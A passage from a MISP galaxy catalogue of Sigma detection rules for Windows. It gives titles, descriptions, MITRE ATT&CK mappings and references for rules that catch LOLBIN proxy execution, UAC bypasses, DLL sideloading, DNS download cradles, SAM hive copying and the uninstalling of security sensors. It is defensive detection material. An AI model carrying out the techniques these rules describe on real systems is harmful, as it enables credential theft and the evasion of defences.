Potential LethalHTA Technique Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 11086. Table References

Links

https://codewhitesec.blogspot.com/2018/07/lethalhta.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml

Cloudflared Portable Execution

Detects the execution of the "cloudflared" binary from a non standard location.

The tag is: misp-galaxy:sigma-rules="Cloudflared Portable Execution"

Cloudflared Portable Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

Table 11087. Table References

Links

https://github.com/cloudflare/cloudflared/releases

https://github.com/cloudflare/cloudflared

https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/

https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/

https://www.intrinsec.com/akira_ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_portable_execution.yml

Remote Access Tool - LogMeIn Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - LogMeIn Execution"

Remote Access Tool - LogMeIn Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 11088. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_logmein.yml

Visual Studio NodejsTools PressAnyKey Renamed Execution

Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries

The tag is: misp-galaxy:sigma-rules="Visual Studio NodejsTools PressAnyKey Renamed Execution"

Visual Studio NodejsTools PressAnyKey Renamed Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11089. Table References

Links

https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5

https://twitter.com/mrd0x/status/1463526834918854661

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml

Invoke-Obfuscation COMPRESS OBFUSCATION

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation COMPRESS OBFUSCATION"

Invoke-Obfuscation COMPRESS OBFUSCATION has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11090. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml

Insecure Proxy/DOH Transfer Via Curl.EXE

Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.

The tag is: misp-galaxy:sigma-rules="Insecure Proxy/DOH Transfer Via Curl.EXE"

Table 11091. Table References

Links

https://curl.se/docs/manpage.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml

MpiExec Lolbin

Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary

The tag is: misp-galaxy:sigma-rules="MpiExec Lolbin"

MpiExec Lolbin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11092. Table References

Links

https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps

https://twitter.com/mrd0x/status/1465058133303246867

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mpiexec.yml

HackTool - F-Secure C3 Load by Rundll32

F-Secure C3 produces DLLs with a default exported StartNodeRelay function.

The tag is: misp-galaxy:sigma-rules="HackTool - F-Secure C3 Load by Rundll32"

HackTool - F-Secure C3 Load by Rundll32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 11093. Table References

Links

https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml

Potential Arbitrary DLL Load Using Winword

Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.

The tag is: misp-galaxy:sigma-rules="Potential Arbitrary DLL Load Using Winword"

Potential Arbitrary DLL Load Using Winword has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 11094. Table References

Links

https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_winword_dll_load.yml

Invoke-Obfuscation Obfuscated IEX Invocation

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Obfuscated IEX Invocation"

Invoke-Obfuscation Obfuscated IEX Invocation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11096. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml

Suspicious Registry Modification From ADS Via Regini.EXE

Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.

The tag is: misp-galaxy:sigma-rules="Suspicious Registry Modification From ADS Via Regini.EXE"

Suspicious Registry Modification From ADS Via Regini.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 11097. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Regini/

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml

Potential Download/Upload Activity Using Type Command

Detects usage of the "type" command to download/upload data from WebDAV server

The tag is: misp-galaxy:sigma-rules="Potential Download/Upload Activity Using Type Command"

Potential Download/Upload Activity Using Type Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11098. Table References

Links

https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_type.yml

Remotely Hosted HTA File Executed Via Mshta.EXE

Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file

The tag is: misp-galaxy:sigma-rules="Remotely Hosted HTA File Executed Via Mshta.EXE"

Remotely Hosted HTA File Executed Via Mshta.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 11099. Table References

Links

https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml

Potential Memory Dumping Activity Via LiveKD

Detects execution of LiveKD based on PE metadata or image name

The tag is: misp-galaxy:sigma-rules="Potential Memory Dumping Activity Via LiveKD"

Table 11101. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/livekd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_livekd_execution.yml

Suspicious Mstsc.EXE Execution With Local RDP File

Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.

The tag is: misp-galaxy:sigma-rules="Suspicious Mstsc.EXE Execution With Local RDP File"

Suspicious Mstsc.EXE Execution With Local RDP File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 11102. Table References

Links

https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/

https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml

Suspicious Extrac32 Execution

Download or Copy file with Extrac32

The tag is: misp-galaxy:sigma-rules="Suspicious Extrac32 Execution"

Suspicious Extrac32 Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11103. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Extrac32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml

Potential RDP Session Hijacking Activity

Detects potential RDP Session Hijacking activity on Windows systems

The tag is: misp-galaxy:sigma-rules="Potential RDP Session Hijacking Activity"

Table 11104. Table References

Links

https://twitter.com/Moti_B/status/909449115477659651

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml

Nslookup PowerShell Download Cradle - ProcessCreation

Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records

The tag is: misp-galaxy:sigma-rules="Nslookup PowerShell Download Cradle - ProcessCreation"

Table 11105. Table References

Links

https://twitter.com/Alh4zr3d/status/1566489367232651264

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml

Suspicious Msbuild Execution By Uncommon Parent Process

Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process

The tag is: misp-galaxy:sigma-rules="Suspicious Msbuild Execution By Uncommon Parent Process"

Table 11106. Table References

Links

https://www.echotrail.io/insights/search/msbuild.exe

https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml

Rar Usage with Password and Compression Level

Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.

The tag is: misp-galaxy:sigma-rules="Rar Usage with Password and Compression Level"

Rar Usage with Password and Compression Level has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 11107. Table References

Links

https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://ss64.com/bash/rar.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml

Potentially Suspicious EventLog Recon Activity Using Log Query Utilities

Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious EventLog Recon Activity Using Log Query Utilities"

Potentially Suspicious EventLog Recon Activity Using Log Query Utilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

Table 11108. Table References

Links

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1

https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/

https://www.group-ib.com/blog/apt41-world-tour-2021/

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon.yml

Renamed Office Binary Execution

Detects the execution of a renamed office binary

The tag is: misp-galaxy:sigma-rules="Renamed Office Binary Execution"

Table 11109. Table References

Links

https://infosec.exchange/@sbousseaden/109542254124022664

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml

Suspicious Advpack Call Via Rundll32.EXE

Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function

The tag is: misp-galaxy:sigma-rules="Suspicious Advpack Call Via Rundll32.EXE"

Table 11110. Table References

Links

http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/

https://twitter.com/Hexacorn/status/1224848930795552769

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml

TrustedPath UAC Bypass Pattern

Detects indicators of a UAC bypass method by mocking directories

The tag is: misp-galaxy:sigma-rules="TrustedPath UAC Bypass Pattern"

TrustedPath UAC Bypass Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 11111. Table References

Links

https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows

https://github.com/netero1010/TrustedPath-UACBypass-BOF

https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml

New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE

Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)

The tag is: misp-galaxy:sigma-rules="New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE"

New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 11112. Table References

Links

https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html

https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml

File Download Using Notepad++ GUP Utility

Detects execution of the Notepad updater (gup) from a process other than Notepad to download files.

The tag is: misp-galaxy:sigma-rules="File Download Using Notepad++ GUP Utility"

File Download Using Notepad++ GUP Utility has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11113. Table References

Links

https://twitter.com/nas_bench/status/1535322182863179776

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_download.yml

PowerShell SAM Copy

Detects suspicious PowerShell scripts accessing SAM hives

The tag is: misp-galaxy:sigma-rules="PowerShell SAM Copy"

PowerShell SAM Copy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 11114. Table References

Links

https://twitter.com/splinter_code/status/1420546784250769408

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_sam_access.yml

HackTool - Certify Execution

Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.

The tag is: misp-galaxy:sigma-rules="HackTool - Certify Execution"

HackTool - Certify Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Authentication Certificates - T1649" with estimative-language:likelihood-probability="almost-certain"

Table 11115. Table References

Links

https://github.com/GhostPack/Certify

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certify.yml

UAC Bypass Using NTFS Reparse Point - Process

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using NTFS Reparse Point - Process"

UAC Bypass Using NTFS Reparse Point - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 11116. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml

Renamed ProcDump Execution

Detects the execution of a renamed ProcDump executable often used by attackers or malware

The tag is: misp-galaxy:sigma-rules="Renamed ProcDump Execution"

Renamed ProcDump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 11117. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml

Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location

Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.

The tag is: misp-galaxy:sigma-rules="Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location"

Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11118. Table References

Links

https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html

https://en.wikipedia.org/wiki/IExpress

https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/

https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iexpress_susp_execution.yml

PUA - Nimgrab Execution

Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.

The tag is: misp-galaxy:sigma-rules="PUA - Nimgrab Execution"

PUA - Nimgrab Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11119. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nimgrab.yml

Application Whitelisting Bypass via Dxcap.exe

Detects execution of of Dxcap.exe

The tag is: misp-galaxy:sigma-rules="Application Whitelisting Bypass via Dxcap.exe"

Application Whitelisting Bypass via Dxcap.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11120. Table References

Links

https://twitter.com/harr0ey/status/992008180904419328

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml

Potential Mpclient.DLL Sideloading Via Defender Binaries

Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.

The tag is: misp-galaxy:sigma-rules="Potential Mpclient.DLL Sideloading Via Defender Binaries"

Potential Mpclient.DLL Sideloading Via Defender Binaries has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 11121. Table References

Links

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml

Xwizard DLL Sideloading

Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll

The tag is: misp-galaxy:sigma-rules="Xwizard DLL Sideloading"

Xwizard DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 11122. Table References

Links

http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/

https://lolbas-project.github.io/lolbas/Binaries/Xwizard/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml

Renamed CURL.EXE Execution

Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields

The tag is: misp-galaxy:sigma-rules="Renamed CURL.EXE Execution"

Renamed CURL.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 11123. Table References

Links

https://twitter.com/Kostastsale/status/1700965142828290260

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_curl.yml

RestrictedAdminMode Registry Value Tampering - ProcCreation

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise

The tag is: misp-galaxy:sigma-rules="RestrictedAdminMode Registry Value Tampering - ProcCreation"

RestrictedAdminMode Registry Value Tampering - ProcCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 11124. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md

https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml

Service StartupType Change Via PowerShell Set-Service

Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"

The tag is: misp-galaxy:sigma-rules="Service StartupType Change Via PowerShell Set-Service"

Service StartupType Change Via PowerShell Set-Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11125. Table References

Links

https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_service_disabled.yml

Uninstall Crowdstrike Falcon Sensor

Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon

The tag is: misp-galaxy:sigma-rules="Uninstall Crowdstrike Falcon Sensor"

Uninstall Crowdstrike Falcon Sensor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11126. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml

Discovery of a System Time

Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.

The tag is: misp-galaxy:sigma-rules="Discovery of a System Time"

Discovery of a System Time has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

Table 11127. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml

Remote Access Tool - RURAT Execution From Unusual Location

Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - RURAT Execution From Unusual Location"

Table 11128. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml

Remote Access Tool - AnyDesk Silent Installation

Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - AnyDesk Silent Installation"

Remote Access Tool - AnyDesk Silent Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 11129. Table References

Links

https://support.anydesk.com/Automatic_Deployment

https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml

HackTool - PowerTool Execution

Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files

The tag is: misp-galaxy:sigma-rules="HackTool - PowerTool Execution"

HackTool - PowerTool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11130. Table References

Links

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml

https://twitter.com/gbti_sa/status/1249653895900602375?lang=en

https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powertool.yml

Suspicious Control Panel DLL Load

Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits

The tag is: misp-galaxy:sigma-rules="Suspicious Control Panel DLL Load"

Suspicious Control Panel DLL Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 11131. Table References

Links

https://twitter.com/rikvduijn/status/853251879320662017

https://twitter.com/felixw3000/status/853354851128025088

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml

Renamed PingCastle Binary Execution

Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.

The tag is: misp-galaxy:sigma-rules="Renamed PingCastle Binary Execution"

Renamed PingCastle Binary Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 11132. Table References

Links

https://www.pingcastle.com/documentation/scanner/

https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pingcastle.yml

Potential Provlaunch.EXE Binary Proxy Execution Abuse

Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.

The tag is: misp-galaxy:sigma-rules="Potential Provlaunch.EXE Binary Proxy Execution Abuse"

Potential Provlaunch.EXE Binary Proxy Execution Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11133. Table References

Links

https://twitter.com/0gtweet/status/1674399582162153472

https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml

Antivirus Password Dumper Detection

Detects a highly relevant Antivirus alert that reports a password dumper

